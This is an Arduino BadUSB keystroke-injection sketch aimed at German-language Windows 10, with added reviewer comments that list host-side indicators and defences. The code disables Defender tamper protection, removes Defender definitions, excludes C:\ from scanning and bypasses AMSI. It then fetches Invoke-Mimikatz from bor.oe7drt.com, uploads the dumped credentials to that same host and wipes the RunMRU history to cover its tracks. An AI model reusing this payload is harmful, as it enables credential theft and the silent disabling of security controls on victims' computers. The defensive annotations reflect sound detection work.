badusb-stick/badusb-stick.ino.disableTamperWorks


#include <Keyboard.h>
#define KEY_DELAY 50 //delay between keystrokes for slow computers
/*
 * Walks the Windows Security app by keyboard to flip the tamper-protection
 * switch (the German UI labels in the comments below are the navigation
 * targets). Everything is timed blindly with delay(): nothing is read back
 * from the host, so a focus change, a different UI language or a slower
 * machine leaves the keystrokes landing in the wrong control.
 * NOTE(review): when tamper protection is enforced centrally (MDM/policy)
 * the GUI switch is not user-toggleable and this sequence is expected to
 * have no effect -- together with USB device control that is the usual
 * defence against HID-keyboard devices like this. Not verifiable from
 * this file.
 */
void disableTampering() {
// Disable tamper protection with the Windows GUI on Windows 10
// Tested on my Lenovo T420 running Windows 10 {VERSION}
// WIN+R: open the Run dialog
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(700);
// "windowsdefender:" is typed into Run; the Windows Security app is the intended target
Keyboard.println("windowsdefender:");
delay(2800);
// Viren- und Bedrohungsschutz
Keyboard.press(KEY_RETURN);
delay(KEY_DELAY);
Keyboard.release(KEY_RETURN);
delay(1200);
// move down to Einstellungen verwalten
// note: in the TAB groups below delay() is given KEY_RETURN, a key code,
// where a millisecond constant (KEY_DELAY) is used everywhere else
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_RETURN);
delay(KEY_DELAY);
Keyboard.release(KEY_RETURN);
delay(1200);
// move down to Manipulationsschutz slider
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
// SPACE toggles the focused switch
Keyboard.press(' ');
delay(KEY_DELAY);
Keyboard.release(' ');
delay(1200);
// yes do it with ALT+j
// (ALT+j = "Ja" on the German UAC/confirmation dialog; the sequence assumes de_DE throughout)
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press('j');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(1000);
// close window with alt f4
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(500);
}
/*
 * Arduino entry point, runs once after the board enumerates as a USB
 * keyboard (de_DE layout, so ALT+j answers the German "Ja" button). The
 * whole payload is typed blindly: no host feedback, fixed delays only.
 *
 * Host-side indicators, all literal in the strings below:
 *  - a new USB HID keyboard, then WIN+R and a RunMRU entry for
 *    "powershell Start-Process cmd -Verb runAs" (later wiped with
 *    Remove-ItemProperty on HKCU:\...\Explorer\RunMRU);
 *  - a UAC elevation prompt for cmd;
 *  - mpcmdrun.exe -RemoveDefinitions -All, Set-MpPreference and
 *    Add-MpPreference -ExclusionPath "C:\" (Defender configuration changes);
 *  - a reflection string naming AmsiUtils / amsiInitFailed;
 *  - outbound HTTP to bor.oe7drt.com (fetch of im.ps1, upload to imrx.php).
 * NOTE(review): the controls that apply to this class of device -- USB HID
 * allow-listing / device control, UAC prompting on the secure desktop with
 * credentials, tamper protection enforced by policy, and alerting on
 * exclusion/definition changes and RunMRU clearing -- cannot be confirmed
 * from this file; check them against the host baseline.
 */
void setup() {
// Keyboard.begin();
Keyboard.begin(KeyboardLayout_de_DE);
//I recommend that you leave a short delay before start while prototyping.
//It will will give you some time to reprogram a board before it starts typing.
delay(15000);
// normal program, only run it once at startup
disableTampering();
// Windows + R
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(700);
// Start cmd as Administrator
// (this text lands in the Run dialog and therefore in the RunMRU history)
Keyboard.println("powershell Start-Process cmd -Verb runAs");
delay(2500);
// press ALT + j to confirm execution as Administrator
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press('j');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(1500);
// If no UAC enabled, we printed j on the console, let's
// initiate a few CTRL+C's to cancel that and get a fresh
// prompt...
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('c');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(200);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('c');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(300);
// Disable Defender; wait a bit longer, because recent only `ershell ...` was printed
// Defender definition/config change -- a high-signal event for host telemetry
Keyboard.println("\"C:\\program files\\windows defender\\mpcmdrun.exe\" -RemoveDefinitions -All Set-MpPreference -DisableOAVProtection $true");
delay(200);
// Start powershell; wait longer because the OS has to bring another window to foreground
Keyboard.println("powershell");
delay(200);
// Add C: to Defender exclusion list
Keyboard.println("Add-MpPreference -ExclusionPath \"C:\\\"");
delay(200);
// reflection string referencing AmsiUtils / amsiInitFailed; AMSI and ETW
// telemetry on the host is the usual detection point for this
Keyboard.println("\"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'.'NonPublic,Static').SetValue($null,$true)\"");
delay(200);
Keyboard.println("exit");
delay(2500);
// Download and execute mimikatz; then upload result log
// remote fetch, credential dump and exfiltration over plain HTTP to
// bor.oe7drt.com -- egress visible to any proxy / IDS on the path
Keyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)\"");
// Keyboard.println("IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)");
delay(9000);
// Clear run history
// anti-forensics step: the RunMRU entries left by the two Run-dialog commands above are removed
Keyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"");
// Keyboard.println("Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue");
delay(400);
// show wlan passwords
// Keyboard.println("netsh wlan show profile key=clear");
// delay(8000);
// exit cmd window
Keyboard.println("exit");
delay(KEY_DELAY);
// stop emulating the keyboard; the device stays enumerated until unplugged
Keyboard.end();
}
/*
 * Deliberately empty: the payload fires once from setup() and nothing runs
 * on the main loop. The ideas in the author's comment below are not
 * implemented.
 */
void loop() {
// do nothing in loop() -- or should we restart the computer? or lock it? or delete something?
// or start a fork bomb etc...
}